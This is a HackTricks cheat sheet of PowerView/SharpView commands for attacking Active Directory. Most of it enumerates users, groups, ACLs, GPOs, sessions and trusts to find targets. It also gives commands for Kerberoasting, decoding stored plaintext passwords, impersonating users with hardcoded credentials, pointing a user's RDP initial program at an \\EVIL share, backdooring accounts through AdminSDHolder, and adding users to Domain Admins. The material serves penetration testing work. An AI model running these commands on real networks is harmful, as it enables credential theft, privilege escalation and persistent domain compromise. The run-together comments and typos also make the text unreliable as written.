PowerView/SharpView | HackTricks (2024)

Get-NetDomain #Basic domain info#User infoGet-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount #Basic user enabled infoGet-NetUser -LDAPFilter '(sidHistory=*)' #Find users with sidHistory setGet-NetUser -PreauthNotRequired #ASREPRoastable usersGet-NetUser -SPN #Kerberoastable users#Groups infoGet-NetGroup | select samaccountname, admincount, descriptionGet-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=EGOTISTICAL-BANK,DC=local' | %{ $_.SecurityIdentifier } | Convert-SidToName #Get AdminSDHolders#ComputersGet-NetComputer | select samaccountname, operatingsystemGet-NetComputer -Unconstrainusered | select samaccountname #DCs always appear but aren't useful for privescGet-NetComputer -TrustedToAuth | select samaccountname #Find computers with Constrained DelegationGet-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} #Find any machine accounts in privileged groups#SharesFind-DomainShare -CheckShareAccess #Search readable shares#Domain trustsGet-NetDomainTrust #Get all domain trusts (parent, children and external)Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found#LHF#Check if any user passwords are set$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl#Asks DC for all computers, and asks every compute if it has admin access (very noisy). You need RCP and SMB ports opened.Find-LocalAdminAccess#Get members from Domain Admins (default) and a list of computers and check if any of the users is logged in any machine running Get-NetSession/Get-NetLoggedon on each host. If -Checkaccess, then it also check for LocalAdmin access in the hosts.Invoke-UserHunter -CheckAccess#Find interesting ACLsInvoke-ACLScanner -ResolveGUIDs | select IdentityReferenceName, ObjectDN, ActiveDirectoryRights | fl

# Domain InfoGet-Domain #Get info about the current domainGet-NetDomain #Get info about the current domainGet-NetDomain -Domain mydomain.localGet-DomainSID #Get domain SID# PolicyGet-DomainPolicy #Get info about the policy(Get-DomainPolicy)."KerberosPolicy" #Kerberos tickets info(MaxServiceAge)(Get-DomainPolicy)."SystemAccess" #Password policyGet-DomainPolicyData | select -ExpandProperty SystemAccess #Same as previous(Get-DomainPolicy).PrivilegeRights #Check your privilegesGet-DomainPolicyData # Same as Get-DomainPolicy# Domain ControllerGet-DomainController | select Forest, Domain, IPAddress, Name, OSVersion | fl # Get specific info of current domain controllerGet-NetDomainController -Domain mydomain.local #Get all ifo of specific domain Domain Controller# Get Forest info Get-ForestDomain

# Users## Get usernames and their groupsGet-DomainUser -Properties name, MemberOf | fl## Get-DomainUser and Get-NetUser are kind of the sameGet-NetUser #Get users with several (not all) propertiesGet-NetUser | select samaccountname, description, pwdlastset, logoncount, badpwdcount #List all usernamesGet-NetUser -UserName student107 #Get info about a userGet-NetUser -properties name, description #Get all descriptionsGet-NetUser -properties name, pwdlastset, logoncount, badpwdcount #Get all pwdlastset, logoncount and badpwdcountFind-UserField -SearchField Description -SearchTerm "built" #Search account with "something" in a parameter# Get users with reversible encryption (PWD in clear text with dcsync)Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol# Users FiltersGet-NetUser -UACFilter NOT_ACCOUNTDISABLE -properties distinguishedname #All enabled usersGet-NetUser -UACFilter ACCOUNTDISABLE #All disabled usersGet-NetUser -UACFilter SMARTCARD_REQUIRED #Users that require a smart cardGet-NetUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname #Not smart card usersGet-NetUser -LDAPFilter '(sidHistory=*)' #Find users with sidHistory setGet-NetUser -PreauthNotRequired #ASREPRoastable usersGet-NetUser -SPN | select serviceprincipalname #Kerberoastable usersGet-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'} #Domain admins kerberostableGet-Netuser -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto #Constrained Resource DelegationGet-NetUser -AllowDelegation -AdminCount #All privileged users that aren't marked as sensitive/not for delegation# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)Get-ObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? { ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}# Users with PASSWD_NOTREQD set in the userAccountControl means that the user is not subject to the current password policy## Users with this flag might have empty passwords (if allowed) or shorter passwordsGet-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol#GroupsGet-DomainGroup | where Name -like "*Admin*" | select SamAccountName## Get-DomainGroup is similar to Get-NetGroup Get-NetGroup #Get groupsGet-NetGroup -Domain mydomain.local #Get groups of an specific domainGet-NetGroup 'Domain Admins' #Get all data of a groupGet-NetGroup -AdminCount | select name,memberof,admincount,member | fl #Search admin grupsGet-NetGroup -UserName "myusername" #Get groups of a userGet-NetGroupMember -Identity "Administrators" -Recurse #Get users inside "Administrators" group. If there are groups inside of this grup, the -Recurse option will print the users inside the others groups alsoGet-NetGroupMember -Identity "Enterprise Admins" -Domain mydomain.local #Remember that "Enterprise Admins" group only exists in the rootdomain of the forestGet-NetLocalGroup -ComputerName dc.mydomain.local -ListGroups #Get Local groups of a machine (you need admin rights in no DC hosts)Get-NetLocalGroupMember -computername dcorp-dc.dollarcorp.moneycorp.local #Get users of localgroups in computerGet-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs #Check AdminSDHolder usersGet-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} #Get ObjectACLs by sidGet-NetGPOGroup #Get restricted groups# ComputersGet-DomainComputer -Properties DnsHostName # Get all domain maes of computers## Get-DomainComputer is kind of the same as Get-NetComputerGet-NetComputer #Get all computer objectsGet-NetComputer -Ping #Send a ping to check if the computers are workingGet-NetComputer -Unconstrained #DCs always appear but aren't useful for privescGet-NetComputer -TrustedToAuth #Find computers with Constrined DelegationGet-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} #Find any machine accounts in privileged groups#OUGet-DomainOU -Properties Name | sort -Property Name #Get names of OUsGet-DomainOU "Servers" | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties Name} #Get all computers inside an OU (Servers in this case)## Get-DomainOU is kind of the same as Get-NetOUGet-NetOU #Get Organization UnitsGet-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers inside an OU (StudentMachines in this case)

Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target)Get-NetSession -ComputerName <servername> #Get active sessions on the hostGet-LoggedOnLocal -ComputerName <servername> #Get locally logon users at the moment (need remote registry (default in server OS))Get-LastLoggedon -ComputerName <servername> #Get last user logged on (needs admin rigths in host)Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host)

#GPOGet-DomainGPO | select displayName #Check the names for infoGet-NetGPO #Get all policies with detailsGet-NetGPO | select displayname #Get the names of the policiesGet-NetGPO -ComputerName <servername> #Get the policy applied in a computergpresult /V #Get current policy# Get who can create new GPOsGet-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=dev,DC=invented,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl# Enumerate permissions for GPOs where users with RIDs of > 1000 have some kind of modification/control rightsGet-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')} | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl# Get permissions a user/group has over any GPO$sid=Convert-NameToSid "Domain Users"Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}# COnvert GPO GUID to nameGet-GPO -Guid 18E5A689-E67F-90B2-1953-198ED4A7F532# Transform SID to nameConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1126# Get GPO of an OUGet-NetGPO -GPOName '{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}'# Returns all GPOs that modify local group memberships through Restricted Groups or Group Policy Preferences.Get-DomainGPOLocalGroup | select GPODisplayName, GroupName, GPOType# Enumerates the machines where a specific domain user/group is a member of a specific local group.Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName

#Get ACLs of an object (permissions of other objects over the indicated one)Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs#Other way to get ACLs of an object$sid = Convert-NameToSid <username/group>Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}#Get permissions of a fileGet-PathAcl -Path "\\dc.mydomain.local\sysvol"#Find intresting ACEs (Interesting permisions of "unexpected objects" (RID>1000 and modify permissions) over other objectsFind-InterestingDomainAcl -ResolveGUIDs#Check if any of the interesting permissions founds is realated to a username/groupFind-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUsers"} #Get special rights over All administrators in domainGet-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "false"} | %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | select ObjectDN, IdentityReference, ActiveDirectoryRights

Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of serversFind-DomainShare -CheckShareAccess #Search readable sharesFind-InterestingDomainShareFile #Find interesting files, can use filters

Get-NetDomainTrust #Get all domain trusts (parent, children and external)Get-DomainTrust #SameGet-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains foundGet-DomainTrustMapping #Enumerate also all the trustsGet-ForestDomain # Get basic forest infoGet-ForestGlobalCatalog #Get info of current forest (no external)Get-ForestGlobalCatalog -Forest external.domain #Get info about the external forest (if possible)Get-DomainTrust -SearchBase "GC://$($ENV:USERDNSDOMAIN)" Get-NetForestTrust #Get forest trusts (it must be between 2 roots, trust between a child and a root is just an external trust)Get-DomainForeingUser #Get users with privileges in other domains inside the forestGet-DomainForeignGroupMember #Get groups with privileges in other domains inside the forest

#Check if any user passwords are set$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl#Asks DC for all computers, and asks every compute if it has admin access (very noisy). You need RCP and SMB ports opened.Find-LocalAdminAccess#(This time you need to give the list of computers in the domain) Do the same as before but trying to execute a WMI action in each computer (admin privs are needed to do so). Useful if RCP and SMB ports are closed..\Find-WMILocalAdminAccess.ps1 -ComputerFile .\computers.txt#Enumerate machines where a particular user/group identity has local admin rightsGet-DomainGPOUserLocalGroupMapping -Identity <User/Group># Enumerates the members of specified local group (default administrators)# for all the targeted machines on the current (or specified) domain.Invoke-EnumerateLocalAdminFind-DomainLocalGroupMember#Search unconstrained delegation computers and show usersFind-DomainUserLocation -ComputerUnconstrained -ShowAll#Admin users that allow delegation, logged into servers that allow unconstrained delegationFind-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation#Get members from Domain Admins (default) and a list of computers# and check if any of the users is logged in any machine running Get-NetSession/Get-NetLoggedon on each host.# If -Checkaccess, then it also check for LocalAdmin access in the hosts.## By default users inside Domain Admins are searchedFind-DomainUserLocation [-CheckAccess] | select UserName, SessionFromNameInvoke-UserHunter [-CheckAccess]#Search "RDPUsers" usersInvoke-UserHunter -GroupName "RDPUsers"#It will only search for active users inside high traffic servers (DC, File Servers and Distributed File servers)Invoke-UserHunter -Stealth

#This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft#You need to be in the AD Recycle Bin group of the AD to list the deleted AD objectsGet-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *

"S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName

Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users

# use an alterate creadential for any function$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)Get-DomainUser -Credential $Cred

# if running in -sta mode, impersonate another credential a la "runas /netonly"$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)Invoke-UserImpersonation -Credential $Cred# ... actionInvoke-RevertToSelf

# set the specified property for the given user identitySet-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose# Set the owner of 'dfm' in the current domain to 'harmj0y'Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y# Backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuseAdd-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All# Add user to 'Domain Admins'Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain.local